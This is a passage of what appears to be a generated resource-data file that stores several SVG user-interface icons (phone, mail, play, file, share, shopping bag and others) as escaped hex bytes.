\x79\x31\x3d\x22\x36\x2e\x35\x31\x22\x20\x78\x32\x3d\x22\x38\x2e\
\x35\x39\x22\x20\x79\x32\x3d\x22\x31\x30\x2e\x34\x39\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x6a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x66\x6f\x72\x77\x61\x72\x64\x65\x64\x22\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x39\
\x20\x31\x20\x32\x33\x20\x35\x20\x31\x39\x20\x39\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x35\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x35\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\
\x20\x31\x36\x2e\x39\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\
\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\
\x2d\x33\x2e\x30\x37\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\
\x30\x20\x30\x20\x31\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\
\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\
\x2d\x38\x2e\x36\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x34\x2e\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\
\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\
\x2e\x38\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\
\x35\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\
\x61\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\
\x6c\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\
\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\
\x32\x2e\x38\x31\x2e\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x32\x20\x31\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x62\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x69\x6c\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x34\x68\x31\
\x36\x63\x31\x2e\x31\x20\x30\x20\x32\x20\x2e\x39\x20\x32\x20\x32\
\x76\x31\x32\x63\x30\x20\x31\x2e\x31\x2d\x2e\x39\x20\x32\x2d\x32\
\x20\x32\x48\x34\x63\x2d\x31\x2e\x31\x20\x30\x2d\x32\x2d\x2e\x39\
\x2d\x32\x2d\x32\x56\x36\x63\x30\x2d\x31\x2e\x31\x2e\x39\x2d\x32\
\x20\x32\x2d\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x32\x32\x2c\x36\x20\x31\x32\x2c\x31\x33\x20\x32\x2c\x36\x22\x3e\
\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x61\x79\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x31\x30\x20\x38\x20\x31\x36\x20\x31\x32\x20\x31\x30\x20\x31\
\x36\x20\x31\x30\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\
\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x51\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x33\x20\x32\x48\
\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x32\x76\
\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\
\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x56\x39\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x33\x20\x32\x20\x31\x33\x20\x39\x20\x32\x30\x20\x39\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x6c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x61\x72\x65\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x32\
\x76\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\
\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x76\x2d\x38\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x36\x20\x36\x20\x31\x32\x20\x32\x20\x38\x20\x36\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\
\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x69\x63\x65\
\x6d\x61\x69\x6c\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x35\x2e\x35\x22\x20\x63\x79\x3d\x22\x31\x31\x2e\x35\x22\
\x20\x72\x3d\x22\x34\x2e\x35\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\
\x2e\x35\x22\x20\x63\x79\x3d\x22\x31\x31\x2e\x35\x22\x20\x72\x3d\
\x22\x34\x2e\x35\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x35\x2e\x35\x22\x20\x79\x31\
\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\x38\x2e\x35\x22\x20\
\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6c\x61\x73\x68\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\x20\x79\x31\x3d\x22\x34\x2e\
\x39\x33\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x79\
\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x37\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x75\x73\x65\
\x2d\x70\x6f\x69\x6e\x74\x65\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x33\x20\x33\x6c\x37\x2e\x30\x37\x20\x31\x36\x2e\
\x39\x37\x20\x32\x2e\x35\x31\x2d\x37\x2e\x33\x39\x20\x37\x2e\x33\
\x39\x2d\x32\x2e\x35\x31\x4c\x33\x20\x33\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x33\
\x20\x31\x33\x6c\x36\x20\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x30\x2e\x36\x38\x20\x31\x33\x2e\x33\x31\x61\x31\x36\x20\x31\
\x36\x20\x30\x20\x30\x20\x30\x20\x33\x2e\x34\x31\x20\x32\x2e\x36\
\x6c\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\
\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\
\x32\x2e\x38\x31\x2e\x37\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x31\x2e\x37\x32\x20\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\
\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\
\x33\x2d\x33\x2e\x30\x37\x20\x31\x39\x2e\x34\x32\x20\x31\x39\x2e\
\x34\x32\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x33\x33\x2d\x32\x2e\
\x36\x37\x6d\x2d\x32\x2e\x36\x37\x2d\x33\x2e\x33\x34\x61\x31\x39\
\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\
\x33\x2e\x30\x37\x2d\x38\x2e\x36\x33\x41\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x20\x34\x2e\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\
\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\
\x2e\x37\x20\x32\x2e\x38\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x2e\x34\x35\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\
\x39\x2e\x39\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x31\
\x22\x20\x78\x32\x3d\x22\x31\x22\x20\x79\x32\x3d\x22\x32\x33\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x74\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x6f\x70\x70\
\x69\x6e\x67\x2d\x62\x61\x67\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x36\x20\x32\x4c\x33\x20\x36\x76\x31\x34\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x31\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x56\x36\x6c\x2d\
\x33\x2d\x34\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\x3d\x22\x36\x22\
\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x36\x20\x31\x30\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\
\x2d\x38\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x60\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x61\x75\x73\x65\
\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\
\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\
\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\x31\
\x35\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x39\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
